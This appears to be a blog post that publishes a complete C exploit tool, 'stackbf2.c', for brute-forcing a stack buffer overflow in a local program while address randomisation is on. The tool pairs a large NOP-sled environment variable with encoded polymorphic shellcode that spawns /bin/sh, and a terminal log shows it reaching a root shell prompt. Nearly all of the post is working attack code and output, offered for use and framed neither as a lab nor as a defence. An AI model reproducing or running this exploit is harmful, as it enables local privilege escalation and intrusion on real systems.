stackbf2.c
This is newer version of stackbf
i use
static inline getesp()
{
__asm__("movl %esp,%eax"); /* will get return address in %eax, no more debugging for that ;) */
}
For return address, because that is has a good accuracy so i use that .
/*
* stack brute forcer by Gunslinger_ yudha.gunslinger@gmail.com
* This is version 2 of stackbf.c
* The difference is we doesn't use our own return address , because some asm that copied %esp register into %eax register
* This return value can be use with good accuracy, so we use for that .
*
* # original assembly of shellcode, but there is has been encoded to polymorphic shellcode for hidding some character like "\xcd\x80" or "int $0x80" in assembly
* .global _start
* _start:
*
* xor %eax, %eax
* xor %ebx, %ebx
* xor %ecx, %ecx
* xor %edx, %edx
*
* mov $0xb, %al
* push %ebx
* push $0x68732f2f
* push $0x6e69622f
* mov %esp, %ebx
* xor %edx, %edx
* xor %edx, %edx
* push %ebx
* int $0x80
*
* inc %eax
* int $0x80
*
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define NOP 0x90
/* Length of environment variable ~ 128 Kb */
#define ENV_LEN 128000
static inline getesp()
{
__asm__("movl %esp,%eax"); /* will get return address in %eax, no more debugging for that ;) */
}
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x35\x80\xe9\x01" /* Polymorphic shell */
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\xfe"
"\x66\x07\xe5\x40\x88\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3"
"\xbe\x18\x66\x07\x66\xfe\x88\x02\xb5\x75\x02\xb5";
int main(int argc, char **argv)
{
char *application = NULL;
char *buffer = NULL;
char env_var[ENV_LEN];
char *env[2] = { env_var, NULL};
int *p, num, ret, pid, payload_size;
if (argc < 3)
{
printf("\nStack Brute Force");
printf("\nProgrammer : Gunslinger_");
printf("\nUsage: %s <application> <payload_size>\n\n", argv[0]);
exit(1);
}
printf("[*] Using return address 0x%x \n", getesp());
printf("[*] Environment variable %d kb\n", ENV_LEN / 1000);
printf("[*] Shellcode size %d bytes\n", strlen(shellcode));
application = strdup(argv[1]);
payload_size = atoi(argv[2]);
buffer = (char*) malloc(payload_size);
memset (env_var, NOP, ENV_LEN);
memcpy (env_var+ENV_LEN-strlen(shellcode)-1, shellcode, strlen(shellcode));
env_var[ENV_LEN-1]=0;
p = (int*) buffer;
for (num = 0; num < payload_size; num += sizeof(int), p++)
*p = getesp();
*p=0;
do {
switch(pid=fork())
{
case 0:
execle (application, application, buffer, NULL, env);
exit(0);
break;
default:
waitpid (pid, &ret, 0);
break;
}
}
while (ret);
}
and this is the program in action
gunslinger@codebreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space 2 gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408 [*] Using return address 0xbf941d04 [*] Environment variable 128 kb [*] Shellcode size 57 bytes # exit gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408 [*] Using return address 0xbfeb4a74 [*] Environment variable 128 kb [*] Shellcode size 57 bytes # exit gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408 [*] Using return address 0xbfdabfc4 [*] Environment variable 128 kb [*] Shellcode size 57 bytes # exit gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408 [*] Using return address 0xbfbdc7a4 [*] Environment variable 128 kb [*] Shellcode size 57 bytes # exit gunslinger@codebreaker:~/bof$
Gunslinger_ blog 
Leave a Reply